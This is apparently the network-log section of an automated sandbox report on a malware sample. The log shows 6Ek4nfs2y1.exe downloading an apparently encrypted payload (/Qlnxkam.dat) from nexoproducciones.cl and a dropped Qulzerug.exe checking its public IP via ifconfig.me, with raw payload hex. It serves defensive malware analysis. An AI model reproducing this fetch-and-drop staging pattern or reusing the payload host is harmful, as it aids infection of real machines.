                      Jul 3, 2024 16:17:21.284867048 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.284873009 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.284919024 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.285423994 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.285439014 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.285495043 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.285501003 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.285514116 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.285546064 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.286247969 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.286263943 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.286317110 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.286324024 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.286360979 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.336019039 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.336198092 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.336507082 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.336524010 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.336592913 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.336608887 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.336997032 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.337018013 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.337065935 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.337073088 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.337081909 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.371476889 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.371501923 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.371556044 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.371592045 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.371606112 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.372246027 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.372266054 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.372297049 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.372303963 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.372318983 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.372807980 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.372822046 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.372860909 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.372867107 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.372884989 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.372998953 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.373095989 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.373101950 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.373119116 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.373146057 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.373161077 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.373353958 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.373367071 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.373394966 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.373421907 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.373426914 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.373445988 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.373920918 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.373939991 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.373970032 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.373975039 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.374002934 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.374011040 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.390228033 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.423564911 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.423595905 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.423640966 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.423666954 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.423681974 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.423702955 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.424186945 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.424204111 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.424240112 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.424246073 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.424276114 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.458391905 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.458416939 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.458470106 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.458492041 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.458512068 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.458525896 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.459291935 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.459307909 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.459351063 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.459357977 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.459384918 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.459399939 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.459815979 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.459836960 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.459876060 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.459882021 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.459912062 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.460537910 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.460557938 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.460599899 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.460606098 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.460635900 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.460649967 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.461090088 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.461107969 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.461153030 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.461159945 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.461199045 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.461203098 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.461777925 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.461803913 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.461829901 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.461837053 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.461863995 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.509310007 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.511754990 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.511811018 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.511831045 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.511841059 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.511869907 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.512538910 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.512554884 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.512612104 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.512617111 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.546391010 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.546411037 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.546509981 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.546535015 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.547868967 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.547883987 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.547951937 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.547957897 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.547981024 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.548599005 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.548619032 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.548667908 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.548679113 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.548719883 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.549479008 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.549493074 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.549550056 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.549561024 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.549576044 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.550445080 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.550458908 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.550508976 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.550514936 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.550535917 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.551130056 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.551142931 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.551189899 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.551194906 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.598848104 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.598874092 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.598938942 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.598975897 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.598989964 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.599601030 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.599622965 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.599648952 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.599654913 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.599682093 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.633969069 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.633985043 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.634030104 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.634042978 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.634057999 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.635207891 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.635222912 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.635277033 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.635284901 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.636194944 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.636209965 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.636255980 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.636262894 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.636285067 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.636960030 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.636975050 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.637027979 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.637034893 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.638030052 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.638045073 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.638087988 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.638094902 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.638114929 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.638745070 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.638765097 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.638797045 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.638803959 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.638832092 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.681180954 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.686589003 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.686608076 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.686695099 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.686706066 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.686736107 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.687316895 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.687362909 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.687388897 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.687395096 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.687422037 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.726669073 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.726692915 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.726739883 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.726763964 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.726777077 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.727329969 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.727344990 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.727380037 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.727389097 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.727396965 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.727405071 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.727411032 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.727441072 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.727446079 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.727469921 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.728128910 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.728144884 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.728243113 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.728252888 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.728641987 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.728679895 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.728693962 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.728699923 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.728715897 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.728765011 CEST44349711104.21.10.178192.168.2.10
                      Jul 3, 2024 16:17:21.728801966 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.731342077 CEST49711443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:17:21.882251024 CEST4971280192.168.2.1034.117.118.44
                      Jul 3, 2024 16:17:21.887212992 CEST804971234.117.118.44192.168.2.10
                      Jul 3, 2024 16:17:21.887341022 CEST4971280192.168.2.1034.117.118.44
                      Jul 3, 2024 16:17:21.887691975 CEST4971280192.168.2.1034.117.118.44
                      Jul 3, 2024 16:17:21.892831087 CEST804971234.117.118.44192.168.2.10
                      Jul 3, 2024 16:17:22.370923996 CEST804971234.117.118.44192.168.2.10
                      Jul 3, 2024 16:17:22.415564060 CEST4971280192.168.2.1034.117.118.44
                      Jul 3, 2024 16:17:22.623016119 CEST4971380192.168.2.1034.117.118.44
                      Jul 3, 2024 16:17:22.628057003 CEST804971334.117.118.44192.168.2.10
                      Jul 3, 2024 16:17:22.628174067 CEST4971380192.168.2.1034.117.118.44
                      Jul 3, 2024 16:17:22.628499031 CEST4971380192.168.2.1034.117.118.44
                      Jul 3, 2024 16:17:22.633399963 CEST804971334.117.118.44192.168.2.10
                      Jul 3, 2024 16:17:23.112396002 CEST804971334.117.118.44192.168.2.10
                      Jul 3, 2024 16:17:23.165622950 CEST4971380192.168.2.1034.117.118.44
                      Jul 3, 2024 16:18:41.025778055 CEST4970580192.168.2.1034.117.118.44
                      Jul 3, 2024 16:18:41.031236887 CEST804970534.117.118.44192.168.2.10
                      Jul 3, 2024 16:18:41.031330109 CEST4970580192.168.2.1034.117.118.44
                      TimestampSource PortDest PortSource IPDest IP
                      Jul 3, 2024 16:16:56.017544985 CEST5476153192.168.2.101.1.1.1
                      Jul 3, 2024 16:16:56.041095018 CEST53547611.1.1.1192.168.2.10
                      Jul 3, 2024 16:17:00.485748053 CEST5527653192.168.2.101.1.1.1
                      Jul 3, 2024 16:17:00.496995926 CEST53552761.1.1.1192.168.2.10
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jul 3, 2024 16:16:56.017544985 CEST192.168.2.101.1.1.10xb29fStandard query (0)nexoproducciones.clA (IP address)IN (0x0001)false
                      Jul 3, 2024 16:17:00.485748053 CEST192.168.2.101.1.1.10x8bcbStandard query (0)ifconfig.meA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jul 3, 2024 16:16:56.041095018 CEST1.1.1.1192.168.2.100xb29fNo error (0)nexoproducciones.cl104.21.10.178A (IP address)IN (0x0001)false
                      Jul 3, 2024 16:16:56.041095018 CEST1.1.1.1192.168.2.100xb29fNo error (0)nexoproducciones.cl172.67.146.41A (IP address)IN (0x0001)false
                      Jul 3, 2024 16:17:00.496995926 CEST1.1.1.1192.168.2.100x8bcbNo error (0)ifconfig.me34.117.118.44A (IP address)IN (0x0001)false
                      • nexoproducciones.cl
                      • ifconfig.me
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.104970534.117.118.44807912C:\Users\user\Desktop\6Ek4nfs2y1.exe
                      TimestampBytes transferredDirectionData
                      Jul 3, 2024 16:17:00.508558989 CEST63OUTGET /ip HTTP/1.1
                      Host: ifconfig.me
                      Connection: Keep-Alive
                      Jul 3, 2024 16:17:01.010091066 CEST162INHTTP/1.1 200 OK
                      date: Wed, 03 Jul 2024 14:17:00 GMT
                      content-type: text/plain
                      Content-Length: 11
                      access-control-allow-origin: *
                      via: 1.1 google
                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                      Data Ascii: 8.46.123.33
                      Jul 3, 2024 16:17:01.261754990 CEST162INHTTP/1.1 200 OK
                      date: Wed, 03 Jul 2024 14:17:00 GMT
                      content-type: text/plain
                      Content-Length: 11
                      access-control-allow-origin: *
                      via: 1.1 google
                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                      Data Ascii: 8.46.123.33


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.104971234.117.118.44807536C:\Users\user\AppData\Roaming\Qulzerug.exe
                      TimestampBytes transferredDirectionData
                      Jul 3, 2024 16:17:21.887691975 CEST63OUTGET /ip HTTP/1.1
                      Host: ifconfig.me
                      Connection: Keep-Alive
                      Jul 3, 2024 16:17:22.370923996 CEST162INHTTP/1.1 200 OK
                      date: Wed, 03 Jul 2024 14:17:21 GMT
                      content-type: text/plain
                      Content-Length: 11
                      access-control-allow-origin: *
                      via: 1.1 google
                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                      Data Ascii: 8.46.123.33


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.104971334.117.118.44801384C:\Users\user\AppData\Roaming\Qulzerug.exe
                      TimestampBytes transferredDirectionData
                      Jul 3, 2024 16:17:22.628499031 CEST63OUTGET /ip HTTP/1.1
                      Host: ifconfig.me
                      Connection: Keep-Alive
                      Jul 3, 2024 16:17:23.112396002 CEST162INHTTP/1.1 200 OK
                      date: Wed, 03 Jul 2024 14:17:22 GMT
                      content-type: text/plain
                      Content-Length: 11
                      access-control-allow-origin: *
                      via: 1.1 google
                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                      Data Ascii: 8.46.123.33


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.1049704104.21.10.1784437364C:\Users\user\Desktop\6Ek4nfs2y1.exe
                      TimestampBytes transferredDirectionData
                      2024-07-03 14:16:56 UTC80OUTGET /Qlnxkam.dat HTTP/1.1
                      Host: nexoproducciones.cl
                      Connection: Keep-Alive
                      2024-07-03 14:16:57 UTC687INHTTP/1.1 200 OK
                      Date: Wed, 03 Jul 2024 14:16:57 GMT
                      Transfer-Encoding: chunked
                      Connection: close
                      last-modified: Wed, 26 Jun 2024 08:23:45 GMT
                      Cache-Control: max-age=2592000
                      expires: Fri, 02 Aug 2024 14:16:57 GMT
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2Ff5zmGaW4qC6gzXRuMamd3VEbRjpL%2Ff8d224uzXUt%2FlfwU9xKNruizJBccFKMXz8Y5B8Pr0wesKIQ2F%2FeL%2BH47vC5UEaFZ46%2FuNJrZX9ivktC%2FBnpXv0q2LwUOjbgN6BM7%2BWOPq"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 89d77f0a78ce41f3-EWR
                      alt-svc: h3=":443"; ma=86400
                      2024-07-03 14:16:57 UTC682INData Raw: 31 65 62 39 0d 0a 2c b2 2b 48 9f af 6d cc 6e 66 c9 60 11 41 de ac 52 d9 7c 3a c2 d0 d9 15 e5 02 e6 ca 84 a3 05 bc cc ca f5 cf 7a ce cc 90 7b 8d 86 69 82 9c 9f 28 95 14 50 94 4a 00 8d 52 84 db dd 71 75 3e 9e 73 e0 ad 51 b6 1c 4a e0 43 bf ef c4 f9 d0 25 07 26 6a 4e d7 fc 1a 45 d3 b3 bd 09 09 83 45 3a 7c e2 2c 6e 29 39 0e 5d 55 c3 d6 fe 0c 42 ae de d5 87 85 52 81 0a 76 4a 0f e1 a7 fb 3d a6 5e a2 77 fe 4d f0 35 d1 ec c6 5a c0 db 59 8e bf 2d 67 8e c2 df 5f d8 c0 50 7e 86 18 bd 68 d8 96 0d 51 ec 2a dd 41 19 c3 a3 be 09 66 10 2c 0b e2 13 96 83 e2 36 9a 71 d6 2f 88 13 80 13 21 84 6e 6e 47 62 9d 02 79 f7 d7 f6 31 a3 89 c1 b8 e8 73 e8 bf 31 be 95 83 26 c0 3e 93 da 1d 00 cf 14 24 d1 27 46 e9 bf 98 51 12 b6 46 4a 3f 14 6e 03 bf a6 da 60 f8 0c 7b db 89 e0 f4 e3 c8 18
                      Data Ascii: 1eb9,+Hmnf`AR|:z{i(PJRqu>sQJC%&jNEE:|,n)9]UBRvJ=^wM5ZY-g_P~hQ*Af,6q/!nnGby1s1&>$'FQFJ?n`{
                      2024-07-03 14:16:57 UTC1369INData Raw: 74 f6 a9 7e 92 4d 51 a0 a0 fd a6 46 15 63 f2 df 95 13 a8 1b ee 9e e9 98 e3 7d 55 a9 71 02 6e 81 8a c1 2e d5 20 2e 6d 37 4f 94 13 e1 01 a2 0b 8f dd 32 0a a8 9e 50 44 fb c0 fb 44 ce 95 85 d5 1d 6a 68 4f ae 94 bd eb b7 b1 29 cd ab a3 b9 75 1c 7e ef f1 06 9d 2b d4 6f d7 7d 58 7d bd 06 72 08 76 b6 2d 49 75 64 83 f7 ef 30 fe 8e d9 a0 22 31 d7 c0 5b 68 b8 35 68 9d ae 0f 37 e1 af b7 67 c6 dc a3 da dd 59 02 aa 45 87 af 18 8b 21 00 d1 00 8d 9d b7 4a 2e b0 47 c5 7b 5b b0 3b 33 29 50 63 34 1f 10 f6 d1 44 9d 40 53 98 92 80 7d f4 99 d2 ac 4d 91 e3 90 01 b0 f5 41 34 ab b4 6d 0b a0 2b 20 1f 62 2f a2 60 38 d5 2d b8 23 51 b3 05 e2 55 75 06 cb f7 b9 aa e7 e9 9b 9a e1 20 47 a5 e4 5c ea 0d 6b b1 1c 80 db 85 98 4c b7 2a f2 8d f7 c7 da f5 66 ed 20 3d 60 98 20 7c 87 a4 6b 98 29
                      Data Ascii: t~MQFc}Uqn. .m7O2PDDjhO)u~+o}X}rv-Iud0"1[h5h7gYE!J.G{[;3)Pc4D@S}MA4m+ b/`8-#QUu G\kL*f =` |k)
                      2024-07-03 14:16:57 UTC1369INData Raw: f8 f9 00 86 20 29 a2 f7 d4 8d bf 09 59 f5 20 1a e5 50 3a d5 3a 0c b0 22 b8 85 8f cc dd 55 13 69 56 ff cb 7c 1d d9 68 8f 77 d1 9b 01 d9 3a 25 92 9d ec a2 e6 c7 65 fb 3b 0c 22 2b 36 b3 f0 fb cc 82 04 62 61 b1 6a 9e ea 0a 83 a5 03 49 df 38 96 09 1a 25 af fe d9 b5 99 ca a7 3a c4 99 53 85 74 b0 af 77 41 66 15 48 76 aa 59 06 4e 75 e3 0e 79 7f 03 c6 e2 ab 86 8b 1c 5f 4e 99 00 60 b5 a5 60 03 bb 20 c8 95 77 e8 b8 00 50 21 d5 de 0d 63 6a a1 cd 7e 2b e5 a5 2d 99 50 ca fb 5c e9 41 8f 68 19 55 06 0d ad c8 07 c5 fd d6 9b 51 a9 09 90 c2 7e 95 ec 92 8b 84 43 f6 d6 7f a9 73 00 a8 a2 8b e9 93 66 93 e9 63 92 ac 42 04 75 45 fe dd ad b6 fe 88 6d ab 1e ff 3a ef 2f ae a3 1c 02 2f 82 67 8c a3 1b 78 c4 4b 88 2a 94 59 6b a7 44 5b df 82 77 0a e2 60 c0 25 cc 3f 41 0b 82 b9 18 c0 ce
                      Data Ascii: )Y P::"UiV|hw:%e;"+6bajI8%:StwAfHvYNuy_N`` wP!cj~+-P\AhUQ~CsfcBuEm://gxK*YkD[w`%?A
